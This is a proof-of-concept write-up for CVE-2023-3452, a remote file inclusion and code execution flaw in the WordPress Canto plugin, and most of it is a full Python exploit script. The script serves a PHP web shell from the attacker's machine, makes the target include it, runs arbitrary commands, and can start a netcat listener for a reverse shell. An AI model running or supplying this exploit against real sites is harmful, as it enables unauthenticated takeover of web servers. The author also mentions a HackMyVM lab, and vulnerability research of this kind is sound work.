In this PoC we will see an Unauthenticated Remote File Inclusion(RFI) and Unauthenticated Remote Code Execution(RCE) that affects the Canto in versions prior to 3.0.5.
What is Canto?
Canto is an open source plugin, a digital asset management software that organizes files and multimedia for businesses.
Proof Of Content (PoC)
This vulnerability affects the wp_abspath parameter which can be found in the following line of includes/lib/download.php
It must also be enabled in php.iniallow_url_include
Let's send a GET request to a python server I have opened on port 8881
We can see that we have received from the GETrequest to our python server, we can see that the call is made from /wp-admin/admin.php , now instead of wanting to send us a request we are going to try to execute a command
Exploit Usage
We will use the script from this repo:
Here is the code:
# Exploit Title: Wordpress Plugin Canto < 3.0.5 - Remote File Inclusion (RFI) and Remote Code Execution (RCE)# Date: 04/11/2023# Exploit Author: Leopoldo Angulo (leoanggal1)# Vendor Homepage: https://wordpress.org/plugins/canto/# Software Link: https://downloads.wordpress.org/plugin/canto.3.0.4.zip# Version: All versions of Canto Plugin prior to 3.0.5# Tested on: Ubuntu 22.04, Wordpress 6.3.2, Canto Plugin 3.0.4# CVE : CVE-2023-3452#PoC Notes:#The Canto plugin for WordPress is vulnerable to Remote File Inclusion in versions up to, and including, 3.0.4 via the 'wp_abspath' parameter. This allows unauthenticated attackers to include and execute arbitrary remote code on the server, provided that allow_url_include is enabled. (Reference: https://nvd.nist.gov/vuln/detail/CVE-2023-3452)#This code exploits the improper handling of the wp_abspath variable in the following line of the "download.php" code:#... require_once($_REQUEST['wp_abspath'] . '/wp-admin/admin.php'); ...#This is just an example but there is this same misconfiguration in other lines of the vulnerable plugin files.# More information in Leoanggal1's Github#!/usr/bin/python3import argparseimport http.serverimport socketserverimport threadingimport requestsimport osimport subprocess# Define the default web shelldefault_web_shell ="<?php system($_GET['cmd']); ?>"defcreate_admin_file(local_dir,local_shell=None):ifnot os.path.exists(local_dir): os.makedirs(local_dir)# If a local shell is provided, use it; otherwise, use the default web shellif local_shell:withopen(f"{local_dir}/admin.php", "wb")as admin_file:withopen(local_shell, "rb")as original_file: admin_file.write(original_file.read())else:withopen(f"{local_dir}/admin.php", "w")as admin_file: admin_file.write(default_web_shell)defstart_local_server(local_port): Handler = http.server.SimpleHTTPRequestHandler httpd = socketserver.TCPServer(("0.0.0.0", local_port), Handler)print(f"Local web server on port {local_port}...") httpd.serve_forever()return httpddefexploit_rfi(url,local_shell,local_host,local_port,command,nc_port): local_dir ="wp-admin"create_admin_file(local_dir, local_shell) target_url =f"{url}/wp-content/plugins/canto/includes/lib/download.php" local_server =f"http://{local_host}:{local_port}" command =f"cmd={command}"if local_shell:# If a local shell is provided, start netcat on the specified port subprocess.Popen(["nc", "-lvp", str(nc_port)]) server_thread = threading.Thread(target=start_local_server, args=(local_port,)) server_thread.daemon =True server_thread.start() exploit_url =f"{target_url}?wp_abspath={local_server}&{command}"print(f"Exploitation URL: {exploit_url}") response = requests.get(exploit_url)print("Server response:")print(response.text)# Shutdown the local web serverprint("Shutting down local web server...") server_thread.join()if__name__=="__main__": examples =''' Examples: - Check the vulnerability python3 CVE-2023-3452.py -u http://192.168.1.142 -LHOST 192.168.1.33 - Execute a command python3 CVE-2023-3452.py -u http://192.168.1.142 -LHOST 192.168.1.33 -c 'id' - Upload and run a reverse shell file. You can download it from https://github.com/pentestmonkey/php-reverse-shell/blob/master/php-reverse-shell.php or generate it with msfvenom. python3 CVE-2023-3452.py -u http://192.168.1.142 -LHOST 192.168.1.33 -NC_PORT 3333 -s php-reverse-shell.php ''' parser = argparse.ArgumentParser(description="Script to exploit the Remote File Inclusion vulnerability in the Canto plugin for WordPress - CVE-2023-3452", epilog=examples, formatter_class=argparse.RawDescriptionHelpFormatter) parser.add_argument("-u", "--url", required=True, default=None, help="Vulnerable URL") parser.add_argument("-s", "--shell", help="Local file for web shell") parser.add_argument("-LHOST", "--local_host", required=True, help="Local web server IP") parser.add_argument("-LPORT", "--local_port", help="Local web server port") parser.add_argument("-c", "--command", default="whoami", help="Command to execute on the target") parser.add_argument("-NC_PORT", "--nc_port", type=int, help="Listener port for netcat")try: args = parser.parse_args()if args.local_port isNone: args.local_port =8080# Valor predeterminado si LPORT no se proporcionaexploit_rfi(args.url, args.shell, args.local_host, int(args.local_port), args.command, args.nc_port)exceptSystemExit: parser.print_help()
Lababoratory CVE-2023-3452
I have created a machine that is currently uploaded to the HackMyVM platform where you can touch this vulnerability